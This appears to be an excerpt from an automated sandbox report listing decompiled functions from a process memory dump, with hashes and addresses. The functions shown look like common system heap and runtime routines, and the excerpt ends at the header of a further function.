Opcode Fuzzy Hash: 5c81f23d79e7bad8d71e6214eae429fe391ad9e440bd7b698119a6b6ce475018
Instruction Fuzzy Hash: 4C51583190021A9FDF2ACF59CC94ADEBBB6BF58350F108159E905AB3A0D7358992CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01604BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01604BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x16cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E015DCC50(_t86);
					L11:
					return E0161B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x16c8504
				E015F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0161FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0161B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L015F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E015DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x16c8504
								E015EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01604F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01604bad
0x01604bbf
0x01604bc2
0x01604bc6
0x01604bcd
0x01604bd9
0x016467fe
0x01646800
0x01604ccc
0x01604ccd
0x01604cb7
0x01604cc9
0x01604cc9
0x01604bdf
0x01604be5
0x00000000
0x00000000
0x01604beb
0x01604bef
0x00000000
0x00000000
0x01604bf5
0x01604bf9
0x01604c06
0x01604c0b
0x01604c17
0x01604c1c
0x01604c1f
0x01604c25
0x01604c33
0x01604c3d
0x01604c40
0x01604c43
0x01604c47
0x01604c4d
0x01604c53
0x01604c54
0x01604c55
0x01604c56
0x01604c5b
0x01604c5c
0x01604c63
0x01604c6b
0x00000000
0x00000000
0x01646776
0x01646784
0x01646784
0x0164679f
0x016467a7
0x016467af
0x016467ce
0x00000000
0x016467b1
0x016467b7
0x016467b8
0x016467c1
0x016467d3
0x016467d9
0x016467dd
0x01604c94
0x01604c94
0x01604c98
0x01604c9c
0x01604ca3
0x016467f4
0x016467f4
0x01604cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01604cb5
0x01604c79
0x01604c7e
0x01604c89
0x01604c8b
0x01604c8f
0x01604c8f
0x00000000
0x01604c89
0x016467c3
0x00000000
0x016467c3
0x016467af
0x01604c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a70a16960d945e9c4e9e62b9a6110b7cce3bfbc82eed39f0b6d3562fab9a616
Instruction ID: 0f8de7c74d2909a66d0646a5a31afe3ebb482ccb8af0f52dbd84a2420a913e53
Opcode Fuzzy Hash: 1a70a16960d945e9c4e9e62b9a6110b7cce3bfbc82eed39f0b6d3562fab9a616
Instruction Fuzzy Hash: FD41A235A002299BDB35DF68CD40BEA77B5FF45710F0104A9EA08AB341DB74DE85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01604D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01604D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x16cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0161FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x16c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0161B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L015F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E015DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0161B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0161F380(_t67 + 0xc, 0x15b5138, 0x10) == 0) {
								 *0x16c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01604F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01604E70(0x16c86b0, 0x1605690, 0, 0) != 0) {
					_t46 = E015DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01604d3b
0x01604d4d
0x01604d53
0x01604d58
0x01604d65
0x01604d6c
0x01604d71
0x01604d77
0x01604d7f
0x01604d8c
0x01604d8e
0x01604dad
0x01604db0
0x01604db7
0x01604db8
0x01604db9
0x01604dba
0x01604dbb
0x01604dc1
0x01604dc8
0x01604dcc
0x01604dd5
0x01604dde
0x01604ddf
0x01604de0
0x01604de1
0x01604de6
0x01604de7
0x01604de9
0x01604df3
0x00000000
0x00000000
0x01646c7c
0x01646c8a
0x01646c8a
0x01646c9d
0x01646ca7
0x01646cac
0x01646cb2
0x01646cb9
0x00000000
0x01646cbf
0x01646cbf
0x00000000
0x01646cbf
0x01646cb9
0x01604dfb
0x01646ccf
0x01646cd3
0x01604e32
0x01604e39
0x01646ce0
0x01646cf2
0x01646cf2
0x01646ce0
0x01604e3f
0x01604e41
0x01604e51
0x01604e51
0x01604e03
0x01604e03
0x01604e09
0x01604e0f
0x01604e57
0x00000000
0x00000000
0x01604e1b
0x01604e30
0x01604e5b
0x01604e5b
0x00000000
0x01604e30
0x01604e11
0x01604e11
0x01604e16
0x00000000
0x01604e16
0x01604e01
0x00000000
0x01604e01
0x01604da5
0x01646c6b
0x00000000
0x01604dab
0x01604dab
0x00000000
0x01604dab

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76aca3e53c718e74759f4fc484a991b4cb3f50a640a37ba8f61361a530e1b2f
Instruction ID: 718d3eceb857629ea562d3738fb6b59aec6b5f21afd1dd351c0174c2746736f4
Opcode Fuzzy Hash: f76aca3e53c718e74759f4fc484a991b4cb3f50a640a37ba8f61361a530e1b2f
Instruction Fuzzy Hash: 6B41D371A403189FEB36DF18CC80FABB7AAEB55610F040099EA459B3C1DB70ED44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 015E8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E015E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x16cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0161B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E015EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x15b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01601DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01613C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E015E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x015e8a0a
0x015e8a1c
0x015e8a23
0x015e8a2e
0x015e8a30
0x015e8a36
0x015e8a3c
0x015e8a3e
0x015e8a4a
0x015e8a52
0x015e8a9c
0x015e8aae
0x015e8a58
0x015e8a5e
0x015e8a6a
0x015e8a6f
0x015e8a75
0x015e8a7d
0x015e8a85
0x015e8a86
0x015e8a89
0x015e8a93
0x015e8a99
0x015e8a9b
0x00000000
0x015e8aaf
0x015e8abe
0x015e8ac3
0x015e8acb
0x015e8ad7
0x015e8ae0
0x015e8af1
0x00000000
0x015e8af1
0x015e8acd
0x015e8ad5
0x015e8afb
0x015e8afd
0x015e8aff
0x015e8b07
0x015e8b22
0x015e8b24
0x015e8b2a
0x015e8b2e
0x015e8b3f
0x015e8b78
0x015e8b41
0x015e8b52
0x015e8b54
0x015e8b5c
0x015e8b74
0x015e8b74
0x015e8b5c
0x015e8b3f
0x015e8b5e
0x015e8b61
0x015e8b64
0x015e8b64
0x015e8b6c
0x015e8b6c
0x015e8b11
0x01639cd5
0x01639cd5
0x015e8b17
0x015e8b1a
0x015e8b1a
0x00000000
0x015e8ad5
0x015e8a89

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab82fe64ca98d283b00371cc1e292487bd9116779bba7e456962a4a889f8a5b3
Instruction ID: 76edad4d7a6ad6fbfd4d40a92bef88d7ad0bde9e5f480b9fecb44154fdc2eff8
Opcode Fuzzy Hash: ab82fe64ca98d283b00371cc1e292487bd9116779bba7e456962a4a889f8a5b3
Instruction Fuzzy Hash: 9C416EB1E002299BDB28DF59DC8CAA9B7F9FB94310F1045E9D919DB242E7709E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0169AA16, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0169AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0169ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0169AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0169AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0167CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L015F77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E015F7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0169131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0167CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0169aa1f
0x0169aa21
0x0169aa23
0x0169aa2b
0x0169aa30
0x0169aa36
0x0169aa39
0x0169aa42
0x0169aa75
0x0169aa7a
0x0169aa7c
0x0169aa7c
0x0169aa88
0x0169aa8a
0x0169aa8f
0x0169ab02
0x0169ab04
0x0169aa99
0x0169aaa8
0x0169aaaf
0x0169aab3
0x0169aacc
0x0169aad1
0x0169aad6
0x0169aae0
0x0169aaf3
0x0169aaf9
0x0169aafe
0x0169aafe
0x0169aaf3
0x0169aad6
0x0169aab3
0x0169ab07
0x0169ab0a
0x0169ab11
0x0169ab23
0x0169ab13
0x0169ab1c
0x0169ab1c
0x0169ab2b
0x0169ab44
0x0169ab44
0x0169ab51
0x0169ab51
0x0169aa44
0x0169aa47
0x0169aa4c
0x00000000
0x00000000
0x0169aa5a
0x0169aa64
0x0169aa72
0x00000000
0x0169aa66
0x0169aa66
0x0169aa68
0x0169aa6a
0x00000000
0x0169aa6a

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 4289bbbf84d6acdca51084f6eb58e722ae555784651c5ade67af508b3bee9ed7
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: E031EE32F002166BEF158AA9CD45BAFFBEFEF84210F098469E905A7399DB749D01C650

Uniqueness

Uniqueness Score: -1.00%

Function 0169FDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0169FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0169FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E016A0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E015F7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01691608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E016A2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0169C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0169DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E015F7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0169A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0169fde7
0x0169fde8
0x0169fdec
0x0169fdee
0x0169fdf5
0x0169fdf7
0x0169fdfc
0x0169fe19
0x0169fe22
0x0169fe26
0x0169fec6
0x0169fecd
0x0169fed5
0x0169fee7
0x0169fed7
0x0169fee0
0x0169fee0
0x0169feef
0x0169ff00
0x0169ff02
0x0169ff07
0x0169ff07
0x00000000
0x0169feef
0x0169fe33
0x0169fe55
0x0169fe59
0x0169fe5b
0x0169fe5e
0x0169fe69
0x0169fe6d
0x0169fe6d
0x0169fe69
0x0169fe35
0x0169fe41
0x0169fe41
0x0169fe79
0x0169fe8b
0x0169fe7b
0x0169fe84
0x0169fe84
0x0169fe93
0x00000000
0x0169fea8
0x0169feba
0x00000000
0x0169feba
0x0169fdfe
0x0169fe01
0x0169fe02
0x0169fe08
0x0169ff0c
0x0169ff14
0x0169ff14

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: d6e332b64626be91744af0dfa56a4048eb2017bd809f1710d7e7146d01639635
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 6131F4323006416FDB229B6CCC44F6ABFAEEBC5650F1A4498E946CB342DB74DC41C764

Uniqueness

Uniqueness Score: -1.00%

Function 0169EA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0169EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E015F2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0169E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E015DF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E015EFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0169AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0169BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E015F7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0168FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E015EFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0169A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0169ea55
0x0169ea66
0x0169ea68
0x0169ea6c
0x0169ea6f
0x0169ea72
0x0169ea75
0x0169ea7a
0x0169ea7a
0x0169ea7e
0x0169ea80
0x0169ea85
0x0169ea8b
0x0169eab5
0x0169eabc
0x0169eabf
0x0169eabf
0x0169eaca
0x0169eace
0x0169ead0
0x0169eae4
0x0169eaeb
0x0169eaf0
0x0169eaf5
0x0169eb09
0x0169eb0d
0x0169eb1d
0x0169eb2d
0x0169eb38
0x0169eb3d
0x0169eb41
0x0169eb4a
0x0169eb60
0x0169eb4c
0x0169eb52
0x0169eb59
0x0169eb59
0x0169eb68
0x0169eb71
0x0169eb71
0x0169ea8d
0x0169ea8f
0x0169ea92
0x0169ea97
0x0169ea97
0x0169ea9b
0x0169ea9c
0x0169ea9e
0x0169eaa6
0x0169eaa6
0x0169eb7e

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 66de47b135c105fda1269d134e5b0854821662cbd4b27904a6d5c6a37e078be8
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: A231B2726047069BCB29DF28CD84A5BB7AAFBC0210F04492EE95287785DF35E805C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 016569A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E016569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x16cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L015E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01656BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01619980() >= 0) {
							E015F2280(_t56, 0x16c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x16c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x16c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E015DB6F0(0x15bc338, 0x15bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01619520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E015EFFB0(_t68, _t77, 0x16c8778);
				}
				_pop(_t78);
				return E0161B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x016569b5
0x016569be
0x016569c3
0x016569c9
0x016569cc
0x016569d1
0x016569d3
0x016569de
0x016569e1
0x016569ea
0x016569f6
0x016569fe
0x01656a13
0x01656a14
0x01656a15
0x01656a16
0x01656a1e
0x01656a26
0x01656a31
0x01656a36
0x01656a37
0x01656a40
0x01656a49
0x01656a4a
0x01656a53
0x01656a59
0x01656a5d
0x01656a5e
0x01656a64
0x01656a67
0x01656a6a
0x01656a6d
0x01656a70
0x01656a77
0x01656a7d
0x01656a86
0x01656a89
0x01656a9c
0x01656a9f
0x01656aa2
0x01656aa5
0x01656aaf
0x01656ab1
0x01656ab8
0x01656ab9
0x01656abb
0x01656abe
0x01656ac5
0x01656ac5
0x01656aaf
0x01656a40
0x01656a26
0x016569fe
0x01656ace
0x01656ad0
0x01656ad3
0x01656ad8
0x01656adf
0x01656adf
0x01656ae8
0x01656aef
0x01656aef
0x01656af9
0x01656b06

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ae4a8941f22a587abe54a9502dc81ff93d525c51e1973f6386a986bd3f7add
Instruction ID: 5d3826565b25a5c672a6bb5dbefaa0a5b7bcfe57daafdf687116fbb60979dc19
Opcode Fuzzy Hash: 28ae4a8941f22a587abe54a9502dc81ff93d525c51e1973f6386a986bd3f7add
Instruction Fuzzy Hash: 784148B1D00209AFEB25DFA9D940BFEBBF9FF48714F14812AE915A7240EB709905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015D5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

